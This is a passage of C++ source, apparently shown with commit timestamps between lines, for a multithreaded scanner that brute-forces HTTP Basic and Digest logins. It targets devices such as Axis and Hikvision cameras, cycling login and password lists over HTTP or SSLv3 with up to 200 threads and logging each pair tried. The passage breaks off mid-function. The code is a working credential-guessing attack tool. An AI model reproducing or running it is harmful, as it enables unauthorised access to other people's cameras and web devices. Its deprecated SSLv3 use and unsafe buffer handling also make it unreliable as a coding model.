2014-09-07 18:54:46 +00:00
# pragma once
# include "STh.h"
# include <libssh/libssh.h>
# include <sstream>
# include <openssl/md5.h>
2014-11-22 16:22:24 +00:00
# include "mainResources.h"
2014-10-26 15:05:51 +00:00
# include "externFunctions.h"
# include "externData.h"
2014-09-07 18:54:46 +00:00
# if defined(Q_OS_WIN32)
# include <iphlpapi.h>
# include <icmpapi.h>
# pragma comment(lib, "iphlpapi.lib")
# endif
int gMaxBrutingThreads = 200 ;
2014-11-22 16:22:24 +00:00
fd_set write_fs ;
2014-09-07 18:54:46 +00:00
void BConInc ( )
{
2014-10-24 16:28:37 +00:00
__asm
{
lock inc BrutingThrds ;
} ;
2014-09-07 18:54:46 +00:00
# pragma region QTGUI_Area
stt - > doEmitionChangeBA ( QString : : number ( BrutingThrds ) ) ;
# pragma endregion
+ + BA ;
} ;
void BConDec ( )
{
2014-11-07 17:22:39 +00:00
if ( BrutingThrds > 0 )
2014-10-24 16:28:37 +00:00
{
2014-11-07 17:22:39 +00:00
__asm
{
lock dec BrutingThrds ;
} ;
}
2014-09-07 18:54:46 +00:00
# pragma region QTGUI_Area
stt - > doEmitionChangeBA ( QString : : number ( BrutingThrds ) ) ;
# pragma endregion
} ;
void SSHConInc ( )
{
2014-10-24 16:28:37 +00:00
__asm
{
lock inc BrutingThrds ;
} ;
2014-09-07 18:54:46 +00:00
# pragma region QTGUI_Area
stt - > doEmitionChangeBA ( QString : : number ( BrutingThrds ) ) ;
# pragma endregion
} ;
void SSHConDec ( )
{
2014-10-24 16:28:37 +00:00
__asm
{
lock dec BrutingThrds ;
} ;
2014-09-07 18:54:46 +00:00
# pragma region QTGUI_Area
stt - > doEmitionChangeBA ( QString : : number ( BrutingThrds ) ) ;
# pragma endregion
} ;
bool debugWriteWait = false ;
void _DebugWriteHTMLToFile ( char * request , char * buff )
{
while ( debugWriteWait ) Sleep ( 50 ) ;
debugWriteWait = true ;
FILE * df = fopen ( " ./debugData.txt " , " a " ) ;
if ( df ! = NULL )
{
fputs ( request , df ) ;
fputs ( " ========================== \n " , df ) ;
fputs ( buff , df ) ;
fputs ( " \n ========================== \n ========================== \n \n " , df ) ;
fclose ( df ) ;
}
else
{
stt - > doEmitionRedFoundData ( " [DEBUG] Cannot open debugData.txt " ) ;
} ;
debugWriteWait = false ;
} ;
unsigned char tl ( unsigned char d )
{
if ( d > = 192 & & d < = 223 )
{
unsigned char y = d + 32 ;
return y ;
}
else
{
return tolower ( d ) ;
} ;
} ;
int recvWT (
int Socket ,
char * Buffer ,
int Len ,
long Timeout ,
int * bTimedOut
) {
fd_set ReadSet ;
int n ;
struct timeval Time ;
FD_ZERO ( & ReadSet ) ;
FD_SET ( Socket , & ReadSet ) ;
Time . tv_sec = Timeout ;
Time . tv_usec = 0 ;
* bTimedOut = FALSE ;
n = select ( Socket + 1 , & ReadSet , NULL , NULL , & Time ) ;
if ( n > 0 ) { /* got some data */
return recv ( Socket , Buffer , Len , 0 ) ;
}
if ( n = = 0 ) { /* timeout */
* bTimedOut = TRUE ;
}
return ( n ) ; /* trouble */
}
2014-10-26 15:05:51 +00:00
std : : string toLowerStr ( const char * str )
2014-09-07 18:54:46 +00:00
{
int tsz = strlen ( str ) ;
if ( tsz = = 1 )
{
if ( str [ 0 ] = = 10 ) return " [No data!] " ;
else return str ;
}
else if ( tsz > 1 )
{
char * strr = new char [ tsz + 1 ] ;
ZeroMemory ( strr , tsz ) ;
for ( int i = 0 ; i < tsz ; i + + )
{
strr [ i ] = tl ( str [ i ] ) ;
} ;
memset ( strr + tsz , ' \0 ' , 1 ) ;
2014-10-26 15:05:51 +00:00
std : : string tstr = strr ;
2014-09-07 18:54:46 +00:00
delete [ ] strr ;
return tstr ;
} ;
return " " ;
} ;
int OpenConnection ( SOCKET * sock , const char * hostname , int port )
{
struct hostent * host ;
struct sockaddr_in addr ;
if ( strlen ( hostname ) = = 0 )
{
if ( gNegDebugMode ) stt - > doEmitionDebugFoundData ( " [<a href= \" http:// " + QString ( hostname ) + " : " + QString : : number ( port ) + " / \" ><font color= \" #0084ff \" > " + QString ( hostname ) + " : " + QString : : number ( port ) + " </font></a> " + " ] Rejecting in _connection: Bad IP. " ) ;
return - 1 ;
} ;
if ( port < 0 | | port > 65535 )
{
if ( gNegDebugMode ) stt - > doEmitionDebugFoundData ( " [<a href= \" http:// " + QString ( hostname ) + " : " + QString : : number ( port ) + " / \" ><font color= \" #0084ff \" > " + QString ( hostname ) + " : " + QString : : number ( port ) + " </font></a> " + " ] Rejecting in _connection: Bad port. " ) ;
return - 1 ;
} ;
if ( ( host = gethostbyname ( hostname ) ) = = NULL )
{
+ + offlines ;
if ( gNegDebugMode ) stt - > doEmitionDebugFoundData ( " [<a href= \" http:// " + QString ( hostname ) + " : " + QString : : number ( port ) + " / \" ><font color= \" #0084ff \" > " + QString ( hostname ) + " : " + QString : : number ( port ) + " </font></a> " + " ] Rejecting in _connection: Bad IP. " ) ;
return - 1 ;
} ;
* sock = socket ( PF_INET , SOCK_STREAM , 0 ) ;
ZeroMemory ( & addr , sizeof ( addr ) ) ;
addr . sin_family = AF_INET ;
addr . sin_port = htons ( port ) ;
addr . sin_addr . s_addr = * ( long * ) ( host - > h_addr ) ;
if ( connect ( * sock , ( struct sockaddr * ) & addr , sizeof ( addr ) ) = = SOCKET_ERROR )
{
+ + offlines ;
2014-11-22 16:22:24 +00:00
CSSOCKET ( * sock ) ;
2014-09-07 18:54:46 +00:00
return - 1 ;
} ;
return 0 ;
}
void _baSSLWorker ( char * ip , char * request , char * rvBuff )
{
SSL_CTX * ctx = NULL ;
2014-09-19 19:27:28 +00:00
const SSL_METHOD * method = SSLv3_client_method ( ) ; /* Create new client-method instance */
ctx = SSL_CTX_new ( method ) ; /* Create new context */
SSL_CTX_set_timeout ( ctx , gTimeOut ) ;
2014-09-07 18:54:46 +00:00
SOCKET sock ;
2014-11-22 16:22:24 +00:00
2014-09-07 18:54:46 +00:00
if ( ctx ! = NULL )
{
int result = OpenConnection ( & sock , ip , 443 ) ;
if ( result > = 0 )
{
SSL * ssl = NULL ;
ssl = SSL_new ( ctx ) ; /* create new SSL connection state */
if ( ssl ! = NULL )
{
SSL_set_fd ( ssl , sock ) ; /* attach the socket descriptor */
if ( SSL_connect ( ssl ) )
{
SSL_write ( ssl , request , strlen ( request ) ) ;
if ( MapWidgetOpened ) stt - > doEmitionAddOutData ( QString ( ip ) , QString ( request ) ) ;
char tempBuff [ 128 ] = { 0 } ;
int x = 1 ;
int xx = 0 ;
ZeroMemory ( rvBuff , sizeof ( rvBuff ) ) ;
while ( xx < 512 )
{
x = SSL_read ( ssl , tempBuff , sizeof ( tempBuff ) ) ;
if ( x < = 0 ) break ;
Activity + = x ;
xx + = x ;
strncat ( rvBuff , tempBuff , x ) ;
ZeroMemory ( tempBuff , sizeof ( tempBuff ) ) ;
} ;
if ( MapWidgetOpened ) stt - > doEmitionAddIncData ( QString ( ip ) , QString ( rvBuff ) ) ;
if ( HTMLDebugMode ) _DebugWriteHTMLToFile ( request , rvBuff ) ;
} ;
SSL_shutdown ( ssl ) ;
SSL_free ( ssl ) ;
2014-11-22 16:22:24 +00:00
CSSOCKET ( sock ) ;
2014-09-07 18:54:46 +00:00
SSL_CTX_free ( ctx ) ; /* release context */
return ;
} ;
2014-11-22 16:22:24 +00:00
} ;
CSSOCKET ( sock ) ;
2014-09-07 18:54:46 +00:00
SSL_CTX_free ( ctx ) ; /* release context */
2014-09-19 19:27:28 +00:00
}
else
{
stt - > doEmitionRedFoundData ( " SSL(InitCTX). " ) ;
2014-09-07 18:54:46 +00:00
} ;
} ;
char * _getAttributeValue ( char * str , char * val , char * ip , int port )
{
char res [ 1024 ] = { 0 } ;
char * ptrStart = NULL ;
char * ptrS1End = NULL ;
char * ptrS2End = NULL ;
ptrStart = strstri ( str , val ) ;
if ( ptrStart ! = NULL )
{
2014-09-19 19:27:28 +00:00
if ( strstri ( ptrStart , " qop=auth " ) ! = NULL ) return " auth " ;
2014-11-03 12:15:34 +00:00
ptrS1End = _findFirst ( ptrStart , " \" " ) ;
2014-09-07 18:54:46 +00:00
if ( ptrS1End ! = NULL )
{
2014-11-03 12:15:34 +00:00
ptrS2End = _findFirst ( ptrS1End + 1 , " \" " ) ;
2014-09-07 18:54:46 +00:00
if ( ptrS2End ! = NULL )
{
int sz = ptrS2End - ptrS1End - 1 ;
if ( sz ! = 0 & & sz < 1024 ) strncpy ( res , ptrS1End + 1 , sz ) ;
else return " " ;
return res ;
}
else
{
2014-09-19 19:27:28 +00:00
stt - > doEmitionRedFoundData ( " [_getAttributeValue] Error retrieving value: \" " + QString ( val ) + " \" IP:<a style= \" color:#819121; \" href= \" http:// " + QString ( ip ) + " : " + QString : : number ( port ) + " / \" > " + QString ( ip ) + " : " + QString : : number ( port ) + " </a> " ) ;
2014-09-07 18:54:46 +00:00
return " " ;
} ;
}
else
{
2014-09-19 19:27:28 +00:00
stt - > doEmitionRedFoundData ( " [_getAttributeValue] Error retrieving value: \" " + QString ( val ) + " \" IP:<a style= \" color:#919121; \" href= \" http:// " + QString ( ip ) + " : " + QString : : number ( port ) + " / \" > " + QString ( ip ) + " : " + QString : : number ( port ) + " </a> " ) ;
2014-09-07 18:54:46 +00:00
return " " ;
} ;
}
else
{
2014-09-19 19:27:28 +00:00
stt - > doEmitionRedFoundData ( " [_getAttributeValue] Error retrieving value: \" " + QString ( val ) + " \" IP:<a style= \" color:#819121; \" href= \" http:// " + QString ( ip ) + " : " + QString : : number ( port ) + " / \" > " + QString ( ip ) + " : " + QString : : number ( port ) + " </a> " ) ;
2014-09-07 18:54:46 +00:00
return " " ;
} ;
} ;
2014-09-08 17:38:19 +00:00
# define HASHLEN 16
typedef char HASH [ HASHLEN ] ;
# define HASHHEXLEN 32
typedef char HASHHEX [ HASHHEXLEN + 1 ] ;
# define IN
# define OUT
void CvtHex (
IN HASH Bin ,
OUT HASHHEX Hex
)
{
unsigned short i ;
unsigned char j ;
for ( i = 0 ; i < HASHLEN ; i + + ) {
j = ( Bin [ i ] > > 4 ) & 0xf ;
if ( j < = 9 )
Hex [ i * 2 ] = ( j + ' 0 ' ) ;
else
Hex [ i * 2 ] = ( j + ' a ' - 10 ) ;
j = Bin [ i ] & 0xf ;
if ( j < = 9 )
Hex [ i * 2 + 1 ] = ( j + ' 0 ' ) ;
else
Hex [ i * 2 + 1 ] = ( j + ' a ' - 10 ) ;
} ;
Hex [ HASHHEXLEN ] = ' \0 ' ;
2014-09-07 18:54:46 +00:00
} ;
2014-09-08 17:38:19 +00:00
char * _makeDigestResponse (
char * login ,
char * realm ,
char * pass ,
char * path ,
char * nonce ,
char * pszNonceCount ,
char * pszCNonce ,
char * pszQop
)
2014-09-07 18:54:46 +00:00
{
2014-09-08 17:38:19 +00:00
char HA1 [ MD5_DIGEST_LENGTH ] ;
char HA2 [ MD5_DIGEST_LENGTH ] ;
2014-09-07 18:54:46 +00:00
char HA1Data [ 512 ] = { 0 } ;
char HA2Data [ 512 ] = { 0 } ;
strcpy ( HA1Data , login ) ;
strcat ( HA1Data , " : " ) ;
strcat ( HA1Data , realm ) ;
strcat ( HA1Data , " : " ) ;
strcat ( HA1Data , pass ) ;
strcpy ( HA2Data , " GET: " ) ;
strcat ( HA2Data , path ) ;
2014-09-08 17:38:19 +00:00
MD5 ( ( unsigned char * ) HA1Data , strlen ( HA1Data ) , ( unsigned char * ) HA1 ) ;
MD5 ( ( unsigned char * ) HA2Data , strlen ( HA2Data ) , ( unsigned char * ) HA2 ) ;
2014-09-07 18:54:46 +00:00
char responseData [ 512 ] = { 0 } ;
char * HA1MD5 = new char [ 64 ] ;
char * HA2MD5 = new char [ 64 ] ;
ZeroMemory ( HA1MD5 , 64 ) ;
ZeroMemory ( HA2MD5 , 64 ) ;
2014-09-08 17:38:19 +00:00
CvtHex ( HA1 , HA1MD5 ) ;
2014-09-07 18:54:46 +00:00
strcpy ( responseData , HA1MD5 ) ;
strcat ( responseData , " : " ) ;
strcat ( responseData , nonce ) ;
2014-09-08 17:38:19 +00:00
strcat ( responseData , " : " ) ;
if ( * pszQop ! = NULL ) {
strcat ( responseData , pszNonceCount ) ;
strcat ( responseData , " : " ) ;
strcat ( responseData , pszCNonce ) ;
strcat ( responseData , " : " ) ;
strcat ( responseData , pszQop ) ;
strcat ( responseData , " : " ) ;
} ;
CvtHex ( HA2 , HA2MD5 ) ;
2014-09-07 18:54:46 +00:00
strcat ( responseData , HA2MD5 ) ;
delete [ ] HA1MD5 ;
delete [ ] HA2MD5 ;
2014-09-08 17:38:19 +00:00
char response [ MD5_DIGEST_LENGTH ] ;
MD5 ( ( unsigned char * ) responseData , strlen ( responseData ) , ( unsigned char * ) response ) ;
2014-09-07 18:54:46 +00:00
char responseMD5 [ 64 ] = { 0 } ;
2014-09-08 17:38:19 +00:00
CvtHex ( response , responseMD5 ) ;
2014-09-07 18:54:46 +00:00
return ( char * ) responseMD5 ;
} ;
lopaStr _BABrute ( char * cookie , char * ip , int port , char * pathT , char * method )
{
if ( strcmp ( method , " [DIGEST] " ) ! = 0 & & strcmp ( method , " [NORMAL] " ) ! = 0 ) stt - > doEmitionRedFoundData ( " [-] Unknown method IP: <a style= \" color: #efe100; \" href= \" http:// " + QString ( ip ) + " : " + QString : : number ( port ) + " \" > " + QString ( ip ) + " : " + QString : : number ( port ) + + " </a> " ) ;
lopaStr lps ;
ZeroMemory ( lps . login , sizeof ( lps . login ) ) ;
ZeroMemory ( lps . pass , sizeof ( lps . pass ) ) ;
ZeroMemory ( lps . other , sizeof ( lps . other ) ) ;
int cookieLen = strlen ( cookie ) ;
char path [ 512 ] = { 0 } ;
strncpy ( path , pathT , 512 ) ;
int bTO ;
bool goon = false ;
2014-09-19 19:27:28 +00:00
char hRqst [ REQUEST_MAX_SIZE ] = { 0 } ;
char headerMsg [ REQUEST_MAX_SIZE ] = { 0 } ;
2014-09-07 18:54:46 +00:00
char hMsgR [ 512 ] = { 0 } ;
strcpy ( hRqst , " GET " ) ;
strcat ( hRqst , path ) ;
strcat ( hRqst , " HTTP/1.1 \r \n Host: " ) ;
strcat ( hRqst , ip ) ;
2014-11-02 09:53:50 +00:00
if ( port ! = 80 ) {
strcat ( hRqst , " : " ) ;
char tbuff [ 16 ] = { 0 } ;
strcat ( hRqst , itoa ( port , tbuff , 10 ) ) ;
} ;
2014-09-07 18:54:46 +00:00
if ( cookieLen ! = 0 )
{
strcat ( hRqst , " \r \n Cookie: " ) ;
strcat ( hRqst , cookie ) ;
} ;
2014-09-19 19:27:28 +00:00
strcat ( hRqst , " \r \n User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 \r \n Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 \r \n Accept-Language: en-US,ru;q=0.9,en;q=0.8 \r \n Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 \r \n Accept-Encoding: text, identity, *;q=0 \r \n Authorization: Basic bG9sa2E6bG9sa2F= \r \n \r \n " ) ;
2014-09-07 18:54:46 +00:00
sockaddr_in sockAddr ;
SOCKET sock ;
# pragma region VerifyBASSL
if ( port = = 443 )
{
2014-09-19 19:27:28 +00:00
ZeroMemory ( headerMsg , REQUEST_MAX_SIZE ) ;
// while(baSSLLocked) Sleep(200);
// baSSLLocked = true;
2014-09-07 18:54:46 +00:00
_baSSLWorker ( ip , hRqst , headerMsg ) ;
2014-09-19 19:27:28 +00:00
// baSSLLocked = false;
2014-09-07 18:54:46 +00:00
}
# pragma endregion
else
# pragma region VerifyBA
{
sockAddr . sin_family = AF_INET ;
sockAddr . sin_port = htons ( port ) ;
HOSTENT * host ;
# if defined(WIN32)
if ( inet_addr ( ip ) ! = INADDR_NONE ) sockAddr . sin_addr . S_un . S_addr = inet_addr ( ip ) ;
else if ( host = gethostbyname ( ip ) ) ( ( unsigned long * ) & sockAddr . sin_addr ) [ 0 ] = ( ( unsigned long * * ) host - > h_addr_list ) [ 0 ] [ 0 ] ;
else
{
2014-10-26 15:05:51 +00:00
isActive = 0 ;
2014-09-19 19:27:28 +00:00
strcpy ( lps . login , " UNKNOWN " ) ;
return lps ;
2014-09-07 18:54:46 +00:00
} ;
# else
if ( inet_addr ( ip ) ! = INADDR_NONE ) sockAddr . sin_addr . s_addr = inet_addr ( ip ) ;
else if ( host = gethostbyname ( ip ) ) ( ( unsigned long * ) & sockAddr . sin_addr ) [ 0 ] = ( ( unsigned long * * ) host - > h_addr_list ) [ 0 ] [ 0 ] ;
else
{
2014-10-26 15:05:51 +00:00
isActive = 0 ;
2014-09-19 19:27:28 +00:00
strcpy ( lps . login , " UNKNOWN " ) ;
return lps ;
2014-09-07 18:54:46 +00:00
} ;
# endif
SOCKET sock = socket ( AF_INET , SOCK_STREAM , IPPROTO_TCP ) ;
connect ( sock , ( sockaddr * ) & sockAddr , sizeof ( sockAddr ) ) ;
send ( sock , hRqst , strlen ( hRqst ) , 0 ) ;
if ( MapWidgetOpened ) stt - > doEmitionAddOutData ( QString ( ip ) , QString ( hRqst ) ) ;
2014-09-19 19:27:28 +00:00
ZeroMemory ( headerMsg , REQUEST_MAX_SIZE ) ;
2014-09-07 18:54:46 +00:00
int x = 1 ;
int xx = 0 ;
while ( xx < 512 )
{
x = recvWT ( sock , hMsgR , sizeof ( hMsgR ) , gTimeOut + 10 , & bTO ) ;
if ( x < = 0 ) break ;
strncat ( headerMsg , hMsgR , x ) ;
xx + = x ;
ZeroMemory ( hMsgR , sizeof ( hMsgR ) ) ;
} ;
if ( MapWidgetOpened ) stt - > doEmitionAddIncData ( QString ( ip ) , QString ( headerMsg ) ) ;
} ;
# pragma endregion
if ( strlen ( headerMsg ) = = 0 )
{
2014-10-26 15:05:51 +00:00
isActive = 0 ;
2014-09-07 18:54:46 +00:00
strcpy ( lps . login , " UNKNOWN " ) ;
return lps ;
} ;
2014-09-19 19:27:28 +00:00
if ( strstr ( headerMsg , " 401 " ) = = NULL
& & strstr ( headerMsg , " .1 401 " ) = = NULL
& & strstr ( headerMsg , " .0 401 " ) = = NULL
& & strstr ( headerMsg , " <statusValue>401</statusValue> " ) = = NULL
& & strstr ( headerMsg , " <statusString>Unauthorized</statusString> " ) = = NULL
)
2014-09-07 18:54:46 +00:00
{
if ( strstri ( headerMsg , " 400 Bad " ) ! = NULL )
{
2014-11-22 16:22:24 +00:00
CSSOCKET ( sock ) ;
2014-09-07 18:54:46 +00:00
strcpy ( lps . other , " [400 Bad Request] " ) ;
2014-10-26 15:05:51 +00:00
isActive = 0 ;
2014-09-07 18:54:46 +00:00
return lps ;
}
2014-09-19 19:27:28 +00:00
else if ( strstri ( headerMsg , " 404 Not " ) ! = NULL
| | strstr ( headerMsg , " 404 " ) ! = NULL
| | strstr ( headerMsg , " .1 404 " ) ! = NULL
| | strstr ( headerMsg , " .0 404 " ) ! = NULL
)
2014-09-07 18:54:46 +00:00
{
if ( strstr ( path , " /axis-cgi/com/ptz.cgi? " ) ! = NULL )
{
int sz = strlen ( " /view/viewer_index.shtml " ) ;
strncpy ( path , " /view/viewer_index.shtml " , sz ) ;
memset ( path + sz , 0 , 1 ) ;
goon = true ;
}
else
2014-11-22 16:22:24 +00:00
{
CSSOCKET ( sock ) ;
2014-09-07 18:54:46 +00:00
strcpy ( lps . other , QString ( " [404 Not Found ( " + QString ( path ) + " )] " ) . toLocal8Bit ( ) . data ( ) ) ;
2014-10-26 15:05:51 +00:00
isActive = 0 ;
2014-09-07 18:54:46 +00:00
return lps ;
} ;
}
2014-09-19 19:27:28 +00:00
else if ( //
( strstr ( headerMsg , " .1 403 " ) ! = NULL //
| | strstr ( headerMsg , " .0 403 " ) ! = NULL //Hikkvision2
) //
& & strstr ( headerMsg , " badAuthorization " ) ! = NULL //
)
{
goon = true ;
}
2014-09-07 18:54:46 +00:00
else if ( strlen ( headerMsg ) < 16 )
{
goon = true ;
stt - > doEmitionRedFoundData ( " Corrupted reply: ( " + QString ( headerMsg ) + " ) " + QString ( ip ) + " : " + QString : : number ( port ) ) ;
} ;
if ( goon = = false )
{
2014-11-22 16:22:24 +00:00
CSSOCKET ( sock ) ;
2014-09-07 18:54:46 +00:00
strcpy ( lps . login , " NULL " ) ;
strcpy ( lps . pass , " NULL " ) ;
2014-10-26 15:05:51 +00:00
isActive = 0 ;
2014-09-07 18:54:46 +00:00
return lps ;
} ;
} ;
2014-11-22 16:22:24 +00:00
CSSOCKET ( sock ) ;
2014-09-07 18:54:46 +00:00
# pragma endregion
2014-10-26 15:05:51 +00:00
isActive = 1 ;
2014-09-07 18:54:46 +00:00
char tPass [ 256 ] = { 0 } ;
char curLogin [ 256 ] = { 0 } ;
char curPass [ 256 ] = { 0 } ;
int cCode ;
int cErrCode ;
int x = 1 ;
int dataSz = 0 ;
2014-09-19 19:27:28 +00:00
char request [ REQUEST_MAX_SIZE ] = { 0 } ;
2014-09-07 18:54:46 +00:00
char recvBuff [ 4096 ] = { 0 } ;
char recvBuff2 [ 512 ] = { 0 } ;
char pass [ 256 ] = { 0 } ;
int WSAErr ;
char localBuff [ 4096 ] = { 0 } ;
strcpy ( localBuff , headerMsg ) ;
int passCounter = 1 ;
char attribute [ 2048 ] = { 0 } ;
char nonce [ 512 ] = { 0 } ;
char realm [ 512 ] = { 0 } ;
2014-09-08 17:38:19 +00:00
char opaque [ 512 ] = { 0 } ;
char qop [ 64 ] = { 0 } ;
2014-10-26 15:05:51 +00:00
std : : string encoded = " " ;
2014-09-07 18:54:46 +00:00
for ( int i = 0 ; i < MaxLogin ; i + + )
{
if ( globalScanFlag = = false ) break ;
for ( int j = 0 ; j < MaxPass ; j + + )
{
if ( globalScanFlag = = false ) break ;
2014-09-19 19:27:28 +00:00
ZeroMemory ( request , REQUEST_MAX_SIZE ) ;
ZeroMemory ( curLogin , sizeof ( curLogin ) ) ;
ZeroMemory ( curPass , sizeof ( curPass ) ) ;
2014-09-07 18:54:46 +00:00
strcpy ( curLogin , loginLst [ i ] ) ;
strcpy ( curPass , passLst [ j ] ) ;
if ( strcmp ( method , " [DIGEST] " ) = = 0 & & strstr ( localBuff , " nonce= " ) ! = NULL )
{
2014-09-19 19:27:28 +00:00
ZeroMemory ( attribute , sizeof ( attribute ) ) ;
2014-09-07 18:54:46 +00:00
strcpy ( attribute , _getAttribute ( localBuff , " WWW-Authenticate: " ) ) ;
2014-09-19 19:27:28 +00:00
ZeroMemory ( nonce , sizeof ( nonce ) ) ;
2014-09-07 18:54:46 +00:00
strcpy ( nonce , _getAttributeValue ( attribute , " nonce= " , ip , port ) ) ;
2014-09-19 19:27:28 +00:00
ZeroMemory ( realm , sizeof ( realm ) ) ;
2014-09-07 18:54:46 +00:00
strcpy ( realm , _getAttributeValue ( attribute , " realm= " , ip , port ) ) ;
2014-09-19 19:27:28 +00:00
ZeroMemory ( qop , sizeof ( qop ) ) ;
2014-09-08 17:38:19 +00:00
if ( strstri ( attribute , " qop " ) ! = NULL )
{
strcpy ( qop , _getAttributeValue ( attribute , " qop= " , ip , port ) ) ;
} ;
2014-09-07 18:54:46 +00:00
strcpy ( request , " GET " ) ;
strcat ( request , path ) ;
strcat ( request , " HTTP/1.1 \r \n Host: " ) ;
strcat ( request , ip ) ;
2014-11-02 09:53:50 +00:00
if ( port ! = 80 ) {
strcat ( request , " : " ) ;
char tbuff [ 16 ] = { 0 } ;
strcat ( request , itoa ( port , tbuff , 10 ) ) ;
} ;
2014-09-07 18:54:46 +00:00
if ( cookieLen ! = 0 )
{
strcat ( request , " \r \n Cookie: " ) ;
strcat ( request , cookie ) ;
} ;
2014-09-19 19:27:28 +00:00
2014-09-07 18:54:46 +00:00
strcat ( request , " \r \n User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 \r \n Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 \r \n Accept-Language: en-US,ru;q=0.9,en;q=0.8 \r \n Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 \r \n Accept-Encoding: text, identity, *;q=0 \r \n Authorization: Digest username= \" " ) ;
strcat ( request , curLogin ) ;
strcat ( request , " \" , realm= \" " ) ;
strcat ( request , realm ) ;
strcat ( request , " \" , nonce= \" " ) ;
strcat ( request , nonce ) ;
strcat ( request , " \" , uri= \" " ) ;
strcat ( request , path ) ;
strcat ( request , " \" , qop=auth, response= \" " ) ;
2014-09-08 17:38:19 +00:00
strcat ( request , _makeDigestResponse ( curLogin , realm , curPass , path , nonce , " 10000001 " , " 9d531d56796e0dc9 " , qop ) ) ;
if ( strstri ( attribute , " opaque " ) ! = NULL )
{
2014-09-19 19:27:28 +00:00
ZeroMemory ( opaque , sizeof ( opaque ) ) ;
2014-09-08 17:38:19 +00:00
strcpy ( opaque , _getAttributeValue ( attribute , " opaque= " , ip , port ) ) ;
strcat ( request , " \" , opaque= \" " ) ;
strcat ( request , opaque ) ;
} ;
strcat ( request , " \" , nc=10000001, cnonce= \" 9d531d56796e0dc9 \" " ) ;
2014-09-09 00:36:46 +00:00
strcat ( request , " \r \n Connection: close \r \n \r \n " ) ;
2014-09-07 18:54:46 +00:00
}
else
{
2014-09-19 19:27:28 +00:00
ZeroMemory ( tPass , sizeof ( tPass ) ) ;
2014-09-07 18:54:46 +00:00
strncpy ( tPass , curLogin , strlen ( curLogin ) ) ;
strcat ( tPass , " : " ) ;
strncat ( tPass , curPass , strlen ( curPass ) ) ;
encoded = base64_encode ( ( const unsigned char * ) tPass , strlen ( tPass ) ) ;
strcpy ( request , " GET " ) ;
strcat ( request , path ) ;
strcat ( request , " HTTP/1.1 \r \n Host: " ) ;
strcat ( request , ip ) ;
2014-11-02 09:53:50 +00:00
if ( port ! = 80 ) {
strcat ( request , " : " ) ;
char tbuff [ 16 ] = { 0 } ;
strcat ( request , itoa ( port , tbuff , 10 ) ) ;
} ;
2014-09-07 18:54:46 +00:00
if ( cookieLen ! = 0 )
{
strcat ( request , " \r \n Cookie: " ) ;
strcat ( request , cookie ) ;
} ;
2014-09-19 19:27:28 +00:00
2014-09-07 18:54:46 +00:00
strcat ( request , " \r \n User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 \r \n Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 \r \n Accept-Language: en-US,ru;q=0.9,en;q=0.8 \r \n Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 \r \n Accept-Encoding: text, identity, *;q=0 \r \n Authorization: Basic " ) ;
strcat ( request , encoded . c_str ( ) ) ;
2014-09-09 00:36:46 +00:00
strcat ( request , " \r \n Connection: close \r \n \r \n " ) ;
2014-09-07 18:54:46 +00:00
} ;
# pragma region BABSEQ-HTTPS
if ( port = = 443 )
{
2014-09-19 19:27:28 +00:00
ZeroMemory ( recvBuff , sizeof ( recvBuff ) ) ;
2014-09-07 18:54:46 +00:00
if ( BALogSwitched ) stt - > doEmitionBAData ( " Probing SSL:BA " + QString ( ip ) + " : " + QString : : number ( port ) + " ; login/pass: " + QString ( tPass ) + " ; " ) ;
_baSSLWorker ( ip , request , recvBuff ) ;
2014-09-19 19:27:28 +00:00
dataSz = strlen ( recvBuff ) ;
2014-09-07 18:54:46 +00:00
}
# pragma endregion
else
# pragma region BABSEQ-HTTP
{
sock = socket ( AF_INET , SOCK_STREAM , IPPROTO_TCP ) ;
cCode = connect ( sock , ( sockaddr * ) & sockAddr , sizeof ( sockAddr ) ) ;
cErrCode = WSAGetLastError ( ) ;
while ( cErrCode = = 10038 )
{
if ( gDebugMode ) stt - > doEmitionDebugFoundData ( " [BA] 10038 occured -- [ " + QString ( ip ) + " : " + QString : : number ( port ) + " ] " ) ;
2014-11-22 16:22:24 +00:00
CSSOCKET ( sock ) ;
2014-09-07 18:54:46 +00:00
sock = socket ( AF_INET , SOCK_STREAM , IPPROTO_TCP ) ;
cCode = connect ( sock , ( sockaddr * ) & sockAddr , sizeof ( sockAddr ) ) ;
cErrCode = WSAGetLastError ( ) ;
} ;
if ( cCode ! = SOCKET_ERROR )
{
x = 1 ;
Activity + = strlen ( request ) ;
if ( send ( sock , request , strlen ( request ) , 0 ) ! = SOCKET_ERROR )
{
if ( MapWidgetOpened ) stt - > doEmitionAddOutData ( QString ( ip ) , QString ( request ) ) ;
dataSz = 0 ;
2014-09-19 19:27:28 +00:00
ZeroMemory ( recvBuff2 , sizeof ( recvBuff2 ) ) ;
ZeroMemory ( recvBuff , sizeof ( recvBuff ) ) ;
2014-09-07 18:54:46 +00:00
while ( x > 0 & & dataSz < 3384 )
{
2014-09-19 19:27:28 +00:00
ZeroMemory ( recvBuff2 , sizeof ( recvBuff2 ) ) ;
x = recvWT ( sock , recvBuff2 , sizeof ( recvBuff2 ) , gTimeOut + 5 , & bTO ) ;
2014-09-07 18:54:46 +00:00
dataSz + = x ;
Activity + = x ;
strncat ( recvBuff , recvBuff2 , x ) ;
} ;
2014-11-03 12:15:34 +00:00
if ( BALogSwitched ) stt - > doEmitionBAData ( " Checked BA: " + QString ( ip ) + " : " + QString : : number ( port ) + " ; login/pass: " + QString ( curLogin ) + " : " + QString ( curPass ) + " ; - Progress: ( " + QString : : number ( ( passCounter / ( double ) ( MaxPass * MaxLogin ) ) * 100 ) . mid ( 0 , 4 ) + " %) " ) ;
2014-09-07 18:54:46 +00:00
}
else
{
